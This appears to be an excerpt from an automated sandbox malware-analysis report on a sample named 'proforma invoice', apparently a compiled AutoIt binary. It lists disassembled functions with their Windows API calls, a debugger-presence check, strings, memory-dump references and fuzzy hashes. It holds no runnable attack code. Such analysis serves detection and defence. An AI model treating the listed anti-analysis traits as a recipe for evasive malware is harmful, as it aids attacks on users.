                  Function 00B00B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                  Download Yara Rule
                  APIs
                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00B00B23
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Message
                  • String ID: AutoIt$Error allocating memory.
                  • API String ID: 2030045667-4017498283
                  • Opcode ID: f0a4f1d97e8ad5136409ddb841e9ac64ef72b3be2aa7089708b83920897948b3
                  • Instruction ID: a0b164f5bd323f98a5c75aae5ce9e17fde5a9b9e418c363d421d6581e0058fd4
                  • Opcode Fuzzy Hash: f0a4f1d97e8ad5136409ddb841e9ac64ef72b3be2aa7089708b83920897948b3
                  • Instruction Fuzzy Hash: E4E0D8322443182AD21036947D03FC97FC8CF05B11F24046AFB58654D38BE1645007E9
                  Function 00AC0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00ABF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00AC0D71,?,?,?,00AA100A), ref: 00ABF7CE
                  • IsDebuggerPresent.KERNEL32(?,?,?,00AA100A), ref: 00AC0D75
                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00AA100A), ref: 00AC0D84
                  Strings
                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00AC0D7F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                  • API String ID: 55579361-631824599
                  • Opcode ID: 48614ac4fab4c8af7e4c8f747f8ce5ce72b2fd10219c93358ce3838a1f8d437a
                  • Instruction ID: 7e7074e66c8a27b06820b227f7237b4adf94d61ab1980ed2fe624ce322ede13d
                  • Opcode Fuzzy Hash: 48614ac4fab4c8af7e4c8f747f8ce5ce72b2fd10219c93358ce3838a1f8d437a
                  • Instruction Fuzzy Hash: F3E06D702003118BD3619FBCD904B567BE4AB00740F11496DE887D7661EFB4E4848BA1
                  Function 00AFD21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: LocalTime
                  • String ID: %.3d$X64
                  • API String ID: 481472006-1077770165
                  • Opcode ID: 65d8f9301ba33947f4edcbaab52448f72d99a2611ee295119ab9b5d9e2254b56
                  • Instruction ID: e4ec695414edee3bb04aff097f87698860de312dff6f47488b9d79a1bd98bb21
                  • Opcode Fuzzy Hash: 65d8f9301ba33947f4edcbaab52448f72d99a2611ee295119ab9b5d9e2254b56
                  • Instruction Fuzzy Hash: 1BD012B180810CE9CB5197D0CC458FAB7BDFB08341F608452FA06A2041E634C50867A1
                  Function 00B32322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                  Download Yara Rule
                  APIs
                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B3232C
                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00B3233F
                    • Part of subcall function 00B0E97B: Sleep.KERNEL32 ref: 00B0E9F3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: FindMessagePostSleepWindow
                  • String ID: Shell_TrayWnd
                  • API String ID: 529655941-2988720461
                  • Opcode ID: 0152af608e82e6fd7f61ad0c01f78029c2b3363cc4bd39c58aa33c3710cc21d9
                  • Instruction ID: 2e773cf9b9ef47f4c363aaadf8e5b1fb74028b31592195ee84950eef5967d599
                  • Opcode Fuzzy Hash: 0152af608e82e6fd7f61ad0c01f78029c2b3363cc4bd39c58aa33c3710cc21d9
                  • Instruction Fuzzy Hash: AED0C936394310B6E664A7B09C0FFDA7E54AB10B10F1149567655BB1E0C9B4A8018B54
                  Function 00B32356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                  Download Yara Rule
                  APIs
                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B3236C
                  • PostMessageW.USER32(00000000), ref: 00B32373
                    • Part of subcall function 00B0E97B: Sleep.KERNEL32 ref: 00B0E9F3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: FindMessagePostSleepWindow
                  • String ID: Shell_TrayWnd
                  • API String ID: 529655941-2988720461
                  • Opcode ID: 8f4483355796799d138f42632cf68eb3dff381adf1ec375ffab2ab329058ceb7
                  • Instruction ID: 35ea3d2dc20da3d2ae143acfca3cc77d5f9c1fc5195e6362cfe33caa0b04ef20
                  • Opcode Fuzzy Hash: 8f4483355796799d138f42632cf68eb3dff381adf1ec375ffab2ab329058ceb7
                  • Instruction Fuzzy Hash: 2BD0C9323813107AE664A7B09C0FFCA7A54AB15B10F5149567655BB1E0C9B4A8018B54
                  Function 00ADBDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00ADBE93
                  • GetLastError.KERNEL32 ref: 00ADBEA1
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00ADBEFC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$ErrorLast
                  • String ID:
                  • API String ID: 1717984340-0
                  • Opcode ID: 2a395a0463644f934f0975004d823af3bea72314187d1ad47d2fb3ac1eeaec5e
                  • Instruction ID: 74ada38d48943c55b244f7ecbd0d1c7d5c07e81a884ff70a84d94336dd8cffe5
                  • Opcode Fuzzy Hash: 2a395a0463644f934f0975004d823af3bea72314187d1ad47d2fb3ac1eeaec5e
                  • Instruction Fuzzy Hash: 5C41C435610246EFCB21CFA5CD44BAA7BA5AF45310F26416AF95A9B3A1DB30DD00DB70